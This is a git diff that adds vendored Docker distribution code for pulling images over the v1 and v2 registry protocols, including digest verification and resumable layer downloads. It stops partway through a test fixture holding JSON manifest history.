+ progress.Update(p.config.ProgressOutput, stringid.TruncateID(img.ID), err.Error()) + return err + } + return nil +} + +func (p *v1Puller) pullImage(ctx context.Context, v1ID, endpoint string, localNameRef reference.Named, layersDownloaded *bool) (err error) { + var history []string + history, err = p.session.GetRemoteHistory(v1ID, endpoint) + if err != nil { + return err + } + if len(history) < 1 { + return fmt.Errorf("empty history for image %s", v1ID) + } + progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1ID), "Pulling dependent layers") + + var ( + descriptors []xfer.DownloadDescriptor + newHistory []image.History + imgJSON []byte + imgSize int64 + ) + + // Iterate over layers, in order from bottom-most to top-most. Download + // config for all layers and create descriptors. + for i := len(history) - 1; i >= 0; i-- { + v1LayerID := history[i] + imgJSON, imgSize, err = p.downloadLayerConfig(v1LayerID, endpoint) + if err != nil { + return err + } + + // Create a new-style config from the legacy configs + h, err := v1.HistoryFromConfig(imgJSON, false) + if err != nil { + return err + } + newHistory = append(newHistory, h) + + layerDescriptor := &v1LayerDescriptor{ + v1LayerID: v1LayerID, + indexName: p.repoInfo.Index.Name, + endpoint: endpoint, + v1IDService: p.v1IDService, + layersDownloaded: layersDownloaded, + layerSize: imgSize, + session: p.session, + } + + descriptors = append(descriptors, layerDescriptor) + } + + rootFS := image.NewRootFS() + resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput) + if err != nil { + return err + } + defer release() + + config, err := v1.MakeConfigFromV1Config(imgJSON, &resultRootFS, newHistory) + if err != nil { + return err + } + + imageID, err := p.config.ImageStore.Put(config) + if err != nil { + return err + } + + if p.config.ReferenceStore != nil { + if err := p.config.ReferenceStore.AddTag(localNameRef, imageID, true); err != nil { + return err + } + } + + return nil +} + +func (p *v1Puller) downloadLayerConfig(v1LayerID, endpoint string) (imgJSON []byte, imgSize int64, err error) { + progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1LayerID), "Pulling metadata") + + retries := 5 + for j := 1; j <= retries; j++ { + imgJSON, imgSize, err := p.session.GetRemoteImageJSON(v1LayerID, endpoint) + if err != nil && j == retries { + progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1LayerID), "Error pulling layer metadata") + return nil, 0, err + } else if err != nil { + time.Sleep(time.Duration(j) * 500 * time.Millisecond) + continue + } + + return imgJSON, imgSize, nil + } + + // not reached + return nil, 0, nil +} + +type v1LayerDescriptor struct { + v1LayerID string + indexName string + endpoint string + v1IDService *metadata.V1IDService + layersDownloaded *bool + layerSize int64 + session *registry.Session + tmpFile *os.File +} + +func (ld *v1LayerDescriptor) Key() string { + return "v1:" + ld.v1LayerID +} + +func (ld *v1LayerDescriptor) ID() string { + return stringid.TruncateID(ld.v1LayerID) +} + +func (ld *v1LayerDescriptor) DiffID() (layer.DiffID, error) { + return ld.v1IDService.Get(ld.v1LayerID, ld.indexName) +} + +func (ld *v1LayerDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) { + progress.Update(progressOutput, ld.ID(), "Pulling fs layer") + layerReader, err := ld.session.GetRemoteImageLayer(ld.v1LayerID, ld.endpoint, ld.layerSize) + if err != nil { + progress.Update(progressOutput, ld.ID(), "Error pulling dependent layers") + if uerr, ok := err.(*url.Error); ok { + err = uerr.Err + } + if terr, ok := err.(net.Error); ok && terr.Timeout() { + return nil, 0, err + } + return nil, 0, xfer.DoNotRetry{Err: err} + } + *ld.layersDownloaded = true + + ld.tmpFile, err = ioutil.TempFile("", "GetImageBlob") + if err != nil { + layerReader.Close() + return nil, 0, err + } + + reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, layerReader), progressOutput, ld.layerSize, ld.ID(), "Downloading") + defer reader.Close() + + _, err = io.Copy(ld.tmpFile, reader) + if err != nil { + ld.Close() + return nil, 0, err + } + + progress.Update(progressOutput, ld.ID(), "Download complete") + + logrus.Debugf("Downloaded %s to tempfile %s", ld.ID(), ld.tmpFile.Name()) + + ld.tmpFile.Seek(0, 0) + + // hand off the temporary file to the download manager, so it will only + // be closed once + tmpFile := ld.tmpFile + ld.tmpFile = nil + + return ioutils.NewReadCloserWrapper(tmpFile, func() error { + tmpFile.Close() + err := os.RemoveAll(tmpFile.Name()) + if err != nil { + logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name()) + } + return err + }), ld.layerSize, nil +} + +func (ld *v1LayerDescriptor) Close() { + if ld.tmpFile != nil { + ld.tmpFile.Close() + if err := os.RemoveAll(ld.tmpFile.Name()); err != nil { + logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name()) + } + ld.tmpFile = nil + } +} + +func (ld *v1LayerDescriptor) Registered(diffID layer.DiffID) { + // Cache mapping from this layer's DiffID to the blobsum + ld.v1IDService.Set(ld.v1LayerID, ld.indexName, diffID) +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2.go b/vendor/github.com/docker/docker/distribution/pull_v2.go new file mode 100644 index 0000000000..88807edc7d --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v2.go @@ -0,0 +1,878 @@ +package distribution + +import ( + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "net/url" + "os" + "runtime" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/manifestlist" + "github.com/docker/distribution/manifest/schema1" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +var ( + errRootFSMismatch = errors.New("layers from manifest don't match image configuration") + errRootFSInvalid = errors.New("invalid rootfs in image configuration") +) + +// ImageConfigPullError is an error pulling the image config blob +// (only applies to schema2). +type ImageConfigPullError struct { + Err error +} + +// Error returns the error string for ImageConfigPullError. +func (e ImageConfigPullError) Error() string { + return "error pulling image configuration: " + e.Err.Error() +} + +type v2Puller struct { + V2MetadataService metadata.V2MetadataService + endpoint registry.APIEndpoint + config *ImagePullConfig + repoInfo *registry.RepositoryInfo + repo distribution.Repository + // confirmedV2 is set to true if we confirm we're talking to a v2 + // registry. This is used to limit fallbacks to the v1 protocol. + confirmedV2 bool +} + +func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) { + // TODO(tiborvass): was ReceiveTimeout + p.repo, p.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull") + if err != nil { + logrus.Warnf("Error getting v2 registry: %v", err) + return err + } + + if err = p.pullV2Repository(ctx, ref); err != nil { + if _, ok := err.(fallbackError); ok { + return err + } + if continueOnError(err) { + logrus.Errorf("Error trying v2 registry: %v", err) + return fallbackError{ + err: err, + confirmedV2: p.confirmedV2, + transportOK: true, + } + } + } + return err +} + +func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (err error) { + var layersDownloaded bool + if !reference.IsNameOnly(ref) { + layersDownloaded, err = p.pullV2Tag(ctx, ref) + if err != nil { + return err + } + } else { + tags, err := p.repo.Tags(ctx).All(ctx) + if err != nil { + // If this repository doesn't exist on V2, we should + // permit a fallback to V1. + return allowV1Fallback(err) + } + + // The v2 registry knows about this repository, so we will not + // allow fallback to the v1 protocol even if we encounter an + // error later on. + p.confirmedV2 = true + + for _, tag := range tags { + tagRef, err := reference.WithTag(ref, tag) + if err != nil { + return err + } + pulledNew, err := p.pullV2Tag(ctx, tagRef) + if err != nil { + // Since this is the pull-all-tags case, don't + // allow an error pulling a particular tag to + // make the whole pull fall back to v1. + if fallbackErr, ok := err.(fallbackError); ok { + return fallbackErr.err + } + return err + } + // pulledNew is true if either new layers were downloaded OR if existing images were newly tagged + // TODO(tiborvass): should we change the name of `layersDownload`? What about message in WriteStatus? + layersDownloaded = layersDownloaded || pulledNew + } + } + + writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded) + + return nil +} + +type v2LayerDescriptor struct { + digest digest.Digest + repoInfo *registry.RepositoryInfo + repo distribution.Repository + V2MetadataService metadata.V2MetadataService + tmpFile *os.File + verifier digest.Verifier + src distribution.Descriptor +} + +func (ld *v2LayerDescriptor) Key() string { + return "v2:" + ld.digest.String() +} + +func (ld *v2LayerDescriptor) ID() string { + return stringid.TruncateID(ld.digest.String()) +} + +func (ld *v2LayerDescriptor) DiffID() (layer.DiffID, error) { + return ld.V2MetadataService.GetDiffID(ld.digest) +} + +func (ld *v2LayerDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) { + logrus.Debugf("pulling blob %q", ld.digest) + + var ( + err error + offset int64 + ) + + if ld.tmpFile == nil { + ld.tmpFile, err = createDownloadFile() + if err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + } else { + offset, err = ld.tmpFile.Seek(0, os.SEEK_END) + if err != nil { + logrus.Debugf("error seeking to end of download file: %v", err) + offset = 0 + + ld.tmpFile.Close() + if err := os.Remove(ld.tmpFile.Name()); err != nil { + logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name()) + } + ld.tmpFile, err = createDownloadFile() + if err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + } else if offset != 0 { + logrus.Debugf("attempting to resume download of %q from %d bytes", ld.digest, offset) + } + } + + tmpFile := ld.tmpFile + + layerDownload, err := ld.open(ctx) + if err != nil { + logrus.Errorf("Error initiating layer download: %v", err) + return nil, 0, retryOnError(err) + } + + if offset != 0 { + _, err := layerDownload.Seek(offset, os.SEEK_SET) + if err != nil { + if err := ld.truncateDownloadFile(); err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + return nil, 0, err + } + } + size, err := layerDownload.Seek(0, os.SEEK_END) + if err != nil { + // Seek failed, perhaps because there was no Content-Length + // header. This shouldn't fail the download, because we can + // still continue without a progress bar. + size = 0 + } else { + if size != 0 && offset > size { + logrus.Debug("Partial download is larger than full blob. Starting over") + offset = 0 + if err := ld.truncateDownloadFile(); err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + } + + // Restore the seek offset either at the beginning of the + // stream, or just after the last byte we have from previous + // attempts. + _, err = layerDownload.Seek(offset, os.SEEK_SET) + if err != nil { + return nil, 0, err + } + } + + reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, layerDownload), progressOutput, size-offset, ld.ID(), "Downloading") + defer reader.Close() + + if ld.verifier == nil { + ld.verifier, err = digest.NewDigestVerifier(ld.digest) + if err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + } + + _, err = io.Copy(tmpFile, io.TeeReader(reader, ld.verifier)) + if err != nil { + if err == transport.ErrWrongCodeForByteRange { + if err := ld.truncateDownloadFile(); err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + return nil, 0, err + } + return nil, 0, retryOnError(err) + } + + progress.Update(progressOutput, ld.ID(), "Verifying Checksum") + + if !ld.verifier.Verified() { + err = fmt.Errorf("filesystem layer verification failed for digest %s", ld.digest) + logrus.Error(err) + + // Allow a retry if this digest verification error happened + // after a resumed download. + if offset != 0 { + if err := ld.truncateDownloadFile(); err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + + return nil, 0, err + } + return nil, 0, xfer.DoNotRetry{Err: err} + } + + progress.Update(progressOutput, ld.ID(), "Download complete") + + logrus.Debugf("Downloaded %s to tempfile %s", ld.ID(), tmpFile.Name()) + + _, err = tmpFile.Seek(0, os.SEEK_SET) + if err != nil { + tmpFile.Close() + if err := os.Remove(tmpFile.Name()); err != nil { + logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name()) + } + ld.tmpFile = nil + ld.verifier = nil + return nil, 0, xfer.DoNotRetry{Err: err} + } + + // hand off the temporary file to the download manager, so it will only + // be closed once + ld.tmpFile = nil + + return ioutils.NewReadCloserWrapper(tmpFile, func() error { + tmpFile.Close() + err := os.RemoveAll(tmpFile.Name()) + if err != nil { + logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name()) + } + return err + }), size, nil +} + +func (ld *v2LayerDescriptor) Close() { + if ld.tmpFile != nil { + ld.tmpFile.Close() + if err := os.RemoveAll(ld.tmpFile.Name()); err != nil { + logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name()) + } + } +} + +func (ld *v2LayerDescriptor) truncateDownloadFile() error { + // Need a new hash context since we will be redoing the download + ld.verifier = nil + + if _, err := ld.tmpFile.Seek(0, os.SEEK_SET); err != nil { + logrus.Errorf("error seeking to beginning of download file: %v", err) + return err + } + + if err := ld.tmpFile.Truncate(0); err != nil { + logrus.Errorf("error truncating download file: %v", err) + return err + } + + return nil +} + +func (ld *v2LayerDescriptor) Registered(diffID layer.DiffID) { + // Cache mapping from this layer's DiffID to the blobsum + ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.FullName()}) +} + +func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdated bool, err error) { + manSvc, err := p.repo.Manifests(ctx) + if err != nil { + return false, err + } + + var ( + manifest distribution.Manifest + tagOrDigest string // Used for logging/progress only + ) + if tagged, isTagged := ref.(reference.NamedTagged); isTagged { + manifest, err = manSvc.Get(ctx, "", distribution.WithTag(tagged.Tag())) + if err != nil { + return false, allowV1Fallback(err) + } + tagOrDigest = tagged.Tag() + } else if digested, isDigested := ref.(reference.Canonical); isDigested { + manifest, err = manSvc.Get(ctx, digested.Digest()) + if err != nil { + return false, err + } + tagOrDigest = digested.Digest().String() + } else { + return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", ref.String()) + } + + if manifest == nil { + return false, fmt.Errorf("image manifest does not exist for tag or digest %q", tagOrDigest) + } + + if m, ok := manifest.(*schema2.DeserializedManifest); ok { + var allowedMediatype bool + for _, t := range p.config.Schema2Types { + if m.Manifest.Config.MediaType == t { + allowedMediatype = true + break + } + } + if !allowedMediatype { + configClass := mediaTypeClasses[m.Manifest.Config.MediaType] + if configClass == "" { + configClass = "unknown" + } + return false, fmt.Errorf("target is %s", configClass) + } + } + + // If manSvc.Get succeeded, we can be confident that the registry on + // the other side speaks the v2 protocol. + p.confirmedV2 = true + + logrus.Debugf("Pulling ref from V2 registry: %s", ref.String()) + progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+p.repo.Named().Name()) + + var ( + id digest.Digest + manifestDigest digest.Digest + ) + + switch v := manifest.(type) { + case *schema1.SignedManifest: + if p.config.RequireSchema2 { + return false, fmt.Errorf("invalid manifest: not schema2") + } + id, manifestDigest, err = p.pullSchema1(ctx, ref, v) + if err != nil { + return false, err + } + case *schema2.DeserializedManifest: + id, manifestDigest, err = p.pullSchema2(ctx, ref, v) + if err != nil { + return false, err + } + case *manifestlist.DeserializedManifestList: + id, manifestDigest, err = p.pullManifestList(ctx, ref, v) + if err != nil { + return false, err + } + default: + return false, errors.New("unsupported manifest format") + } + + progress.Message(p.config.ProgressOutput, "", "Digest: "+manifestDigest.String()) + + if p.config.ReferenceStore != nil { + oldTagID, err := p.config.ReferenceStore.Get(ref) + if err == nil { + if oldTagID == id { + return false, addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id) + } + } else if err != reference.ErrDoesNotExist { + return false, err + } + + if canonical, ok := ref.(reference.Canonical); ok { + if err = p.config.ReferenceStore.AddDigest(canonical, id, true); err != nil { + return false, err + } + } else { + if err = addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id); err != nil { + return false, err + } + if err = p.config.ReferenceStore.AddTag(ref, id, true); err != nil { + return false, err + } + } + } + return true, nil +} + +func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverifiedManifest *schema1.SignedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) { + var verifiedManifest *schema1.Manifest + verifiedManifest, err = verifySchema1Manifest(unverifiedManifest, ref) + if err != nil { + return "", "", err + } + + rootFS := image.NewRootFS() + + // remove duplicate layers and check parent chain validity + err = fixManifestLayers(verifiedManifest) + if err != nil { + return "", "", err + } + + var descriptors []xfer.DownloadDescriptor + + // Image history converted to the new format + var history []image.History + + // Note that the order of this loop is in the direction of bottom-most + // to top-most, so that the downloads slice gets ordered correctly. + for i := len(verifiedManifest.FSLayers) - 1; i >= 0; i-- { + blobSum := verifiedManifest.FSLayers[i].BlobSum + + var throwAway struct { + ThrowAway bool `json:"throwaway,omitempty"` + } + if err := json.Unmarshal([]byte(verifiedManifest.History[i].V1Compatibility), &throwAway); err != nil { + return "", "", err + } + + h, err := v1.HistoryFromConfig([]byte(verifiedManifest.History[i].V1Compatibility), throwAway.ThrowAway) + if err != nil { + return "", "", err + } + history = append(history, h) + + if throwAway.ThrowAway { + continue + } + + layerDescriptor := &v2LayerDescriptor{ + digest: blobSum, + repoInfo: p.repoInfo, + repo: p.repo, + V2MetadataService: p.V2MetadataService, + } + + descriptors = append(descriptors, layerDescriptor) + } + + resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput) + if err != nil { + return "", "", err + } + defer release() + + config, err := v1.MakeConfigFromV1Config([]byte(verifiedManifest.History[0].V1Compatibility), &resultRootFS, history) + if err != nil { + return "", "", err + } + + imageID, err := p.config.ImageStore.Put(config) + if err != nil { + return "", "", err + } + + manifestDigest = digest.FromBytes(unverifiedManifest.Canonical) + + return imageID, manifestDigest, nil +} + +func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) { + manifestDigest, err = schema2ManifestDigest(ref, mfst) + if err != nil { + return "", "", err + } + + target := mfst.Target() + if _, err := p.config.ImageStore.Get(target.Digest); err == nil { + // If the image already exists locally, no need to pull + // anything. + return target.Digest, manifestDigest, nil + } + + var descriptors []xfer.DownloadDescriptor + + // Note that the order of this loop is in the direction of bottom-most + // to top-most, so that the downloads slice gets ordered correctly. + for _, d := range mfst.Layers { + layerDescriptor := &v2LayerDescriptor{ + digest: d.Digest, + repo: p.repo, + repoInfo: p.repoInfo, + V2MetadataService: p.V2MetadataService, + src: d, + } + + descriptors = append(descriptors, layerDescriptor) + } + + configChan := make(chan []byte, 1) + errChan := make(chan error, 1) + var cancel func() + ctx, cancel = context.WithCancel(ctx) + + // Pull the image config + go func() { + configJSON, err := p.pullSchema2Config(ctx, target.Digest) + if err != nil { + errChan <- ImageConfigPullError{Err: err} + cancel() + return + } + configChan <- configJSON + }() + + var ( + configJSON []byte // raw serialized image config + downloadedRootFS *image.RootFS // rootFS from registered layers + configRootFS *image.RootFS // rootFS from configuration + ) + + // https://github.com/docker/docker/issues/24766 - Err on the side of caution, + // explicitly blocking images intended for linux from the Windows daemon. On + // Windows, we do this before the attempt to download, effectively serialising + // the download slightly slowing it down. We have to do it this way, as + // chances are the download of layers itself would fail due to file names + // which aren't suitable for NTFS. At some point in the future, if a similar + // check to block Windows images being pulled on Linux is implemented, it + // may be necessary to perform the same type of serialisation. + if runtime.GOOS == "windows" { + configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan) + if err != nil { + return "", "", err + } + + if configRootFS == nil { + return "", "", errRootFSInvalid + } + } + + if p.config.DownloadManager != nil { + downloadRootFS := *image.NewRootFS() + rootFS, release, err := p.config.DownloadManager.Download(ctx, downloadRootFS, descriptors, p.config.ProgressOutput) + if err != nil { + if configJSON != nil { + // Already received the config + return "", "", err + } + select { + case err = <-errChan: + return "", "", err + default: + cancel() + select { + case <-configChan: + case <-errChan: + } + return "", "", err + } + } + if release != nil { + defer release() + } + + downloadedRootFS = &rootFS + } + + if configJSON == nil { + configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan) + if err != nil { + return "", "", err + } + + if configRootFS == nil { + return "", "", errRootFSInvalid + } + } + + if downloadedRootFS != nil { + // The DiffIDs returned in rootFS MUST match those in the config. + // Otherwise the image config could be referencing layers that aren't + // included in the manifest. + if len(downloadedRootFS.DiffIDs) != len(configRootFS.DiffIDs) { + return "", "", errRootFSMismatch + } + + for i := range downloadedRootFS.DiffIDs { + if downloadedRootFS.DiffIDs[i] != configRootFS.DiffIDs[i] { + return "", "", errRootFSMismatch + } + } + } + + imageID, err := p.config.ImageStore.Put(configJSON) + if err != nil { + return "", "", err + } + + return imageID, manifestDigest, nil +} + +func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, error) { + select { + case configJSON := <-configChan: + rootfs, err := s.RootFSFromConfig(configJSON) + if err != nil { + return nil, nil, err + } + return configJSON, rootfs, nil + case err := <-errChan: + return nil, nil, err + // Don't need a case for ctx.Done in the select because cancellation + // will trigger an error in p.pullSchema2ImageConfig. + } +} + +// pullManifestList handles "manifest lists" which point to various +// platform-specifc manifests. +func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList) (id digest.Digest, manifestListDigest digest.Digest, err error) { + manifestListDigest, err = schema2ManifestDigest(ref, mfstList) + if err != nil { + return "", "", err + } + + var manifestDigest digest.Digest + for _, manifestDescriptor := range mfstList.Manifests { + // TODO(aaronl): The manifest list spec supports optional + // "features" and "variant" fields. These are not yet used. + // Once they are, their values should be interpreted here. + if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == runtime.GOOS { + manifestDigest = manifestDescriptor.Digest + break + } + } + + if manifestDigest == "" { + return "", "", errors.New("no supported platform found in manifest list") + } + + manSvc, err := p.repo.Manifests(ctx) + if err != nil { + return "", "", err + } + + manifest, err := manSvc.Get(ctx, manifestDigest) + if err != nil { + return "", "", err + } + + manifestRef, err := reference.WithDigest(reference.TrimNamed(ref), manifestDigest) + if err != nil { + return "", "", err + } + + switch v := manifest.(type) { + case *schema1.SignedManifest: + id, _, err = p.pullSchema1(ctx, manifestRef, v) + if err != nil { + return "", "", err + } + case *schema2.DeserializedManifest: + id, _, err = p.pullSchema2(ctx, manifestRef, v) + if err != nil { + return "", "", err + } + default: + return "", "", errors.New("unsupported manifest format") + } + + return id, manifestListDigest, err +} + +func (p *v2Puller) pullSchema2Config(ctx context.Context, dgst digest.Digest) (configJSON []byte, err error) { + blobs := p.repo.Blobs(ctx) + configJSON, err = blobs.Get(ctx, dgst) + if err != nil { + return nil, err + } + + // Verify image config digest + verifier, err := digest.NewDigestVerifier(dgst) + if err != nil { + return nil, err + } + if _, err := verifier.Write(configJSON); err != nil { + return nil, err + } + if !verifier.Verified() { + err := fmt.Errorf("image config verification failed for digest %s", dgst) + logrus.Error(err) + return nil, err + } + + return configJSON, nil +} + +// schema2ManifestDigest computes the manifest digest, and, if pulling by +// digest, ensures that it matches the requested digest. +func schema2ManifestDigest(ref reference.Named, mfst distribution.Manifest) (digest.Digest, error) { + _, canonical, err := mfst.Payload() + if err != nil { + return "", err + } + + // If pull by digest, then verify the manifest digest. + if digested, isDigested := ref.(reference.Canonical); isDigested { + verifier, err := digest.NewDigestVerifier(digested.Digest()) + if err != nil { + return "", err + } + if _, err := verifier.Write(canonical); err != nil { + return "", err + } + if !verifier.Verified() { + err := fmt.Errorf("manifest verification failed for digest %s", digested.Digest()) + logrus.Error(err) + return "", err + } + return digested.Digest(), nil + } + + return digest.FromBytes(canonical), nil +} + +// allowV1Fallback checks if the error is a possible reason to fallback to v1 +// (even if confirmedV2 has been set already), and if so, wraps the error in +// a fallbackError with confirmedV2 set to false. Otherwise, it returns the +// error unmodified. +func allowV1Fallback(err error) error { + switch v := err.(type) { + case errcode.Errors: + if len(v) != 0 { + if v0, ok := v[0].(errcode.Error); ok && shouldV2Fallback(v0) { + return fallbackError{ + err: err, + confirmedV2: false, + transportOK: true, + } + } + } + case errcode.Error: + if shouldV2Fallback(v) { + return fallbackError{ + err: err, + confirmedV2: false, + transportOK: true, + } + } + case *url.Error: + if v.Err == auth.ErrNoBasicAuthCredentials { + return fallbackError{err: err, confirmedV2: false} + } + } + + return err +} + +func verifySchema1Manifest(signedManifest *schema1.SignedManifest, ref reference.Named) (m *schema1.Manifest, err error) { + // If pull by digest, then verify the manifest digest. NOTE: It is + // important to do this first, before any other content validation. If the + // digest cannot be verified, don't even bother with those other things. + if digested, isCanonical := ref.(reference.Canonical); isCanonical { + verifier, err := digest.NewDigestVerifier(digested.Digest()) + if err != nil { + return nil, err + } + if _, err := verifier.Write(signedManifest.Canonical); err != nil { + return nil, err + } + if !verifier.Verified() { + err := fmt.Errorf("image verification failed for digest %s", digested.Digest()) + logrus.Error(err) + return nil, err + } + } + m = &signedManifest.Manifest + + if m.SchemaVersion != 1 { + return nil, fmt.Errorf("unsupported schema version %d for %q", m.SchemaVersion, ref.String()) + } + if len(m.FSLayers) != len(m.History) { + return nil, fmt.Errorf("length of history not equal to number of layers for %q", ref.String()) + } + if len(m.FSLayers) == 0 { + return nil, fmt.Errorf("no FSLayers in manifest for %q", ref.String()) + } + return m, nil +} + +// fixManifestLayers removes repeated layers from the manifest and checks the +// correctness of the parent chain. +func fixManifestLayers(m *schema1.Manifest) error { + imgs := make([]*image.V1Image, len(m.FSLayers)) + for i := range m.FSLayers { + img := &image.V1Image{} + + if err := json.Unmarshal([]byte(m.History[i].V1Compatibility), img); err != nil { + return err + } + + imgs[i] = img + if err := v1.ValidateID(img.ID); err != nil { + return err + } + } + + if imgs[len(imgs)-1].Parent != "" && runtime.GOOS != "windows" { + // Windows base layer can point to a base layer parent that is not in manifest. + return errors.New("invalid parent ID in the base layer of the image") + } + + // check general duplicates to error instead of a deadlock + idmap := make(map[string]struct{}) + + var lastID string + for _, img := range imgs { + // skip IDs that appear after each other, we handle those later + if _, exists := idmap[img.ID]; img.ID != lastID && exists { + return fmt.Errorf("ID %+v appears multiple times in manifest", img.ID) + } + lastID = img.ID + idmap[lastID] = struct{}{} + } + + // backwards loop so that we keep the remaining indexes after removing items + for i := len(imgs) - 2; i >= 0; i-- { + if imgs[i].ID == imgs[i+1].ID { // repeated ID. remove and continue + m.FSLayers = append(m.FSLayers[:i], m.FSLayers[i+1:]...) + m.History = append(m.History[:i], m.History[i+1:]...) + } else if imgs[i].Parent != imgs[i+1].ID { + return fmt.Errorf("Invalid parent ID. Expected %v, got %v.", imgs[i+1].ID, imgs[i].Parent) + } + } + + return nil +} + +func createDownloadFile() (*os.File, error) { + return ioutil.TempFile("", "GetImageBlob") +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_test.go b/vendor/github.com/docker/docker/distribution/pull_v2_test.go new file mode 100644 index 0000000000..b745642e3b --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v2_test.go @@ -0,0 +1,183 @@ +package distribution + +import ( + "encoding/json" + "io/ioutil" + "reflect" + "runtime" + "strings" + "testing" + + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema1" + "github.com/docker/docker/reference" +) + +// TestFixManifestLayers checks that fixManifestLayers removes a duplicate +// layer, and that it makes no changes to the manifest when called a second +// time, after the duplicate is removed. +func TestFixManifestLayers(t *testing.T) { + duplicateLayerManifest := schema1.Manifest{ + FSLayers: []schema1.FSLayer{ + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")}, + }, + History: []schema1.History{ + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT 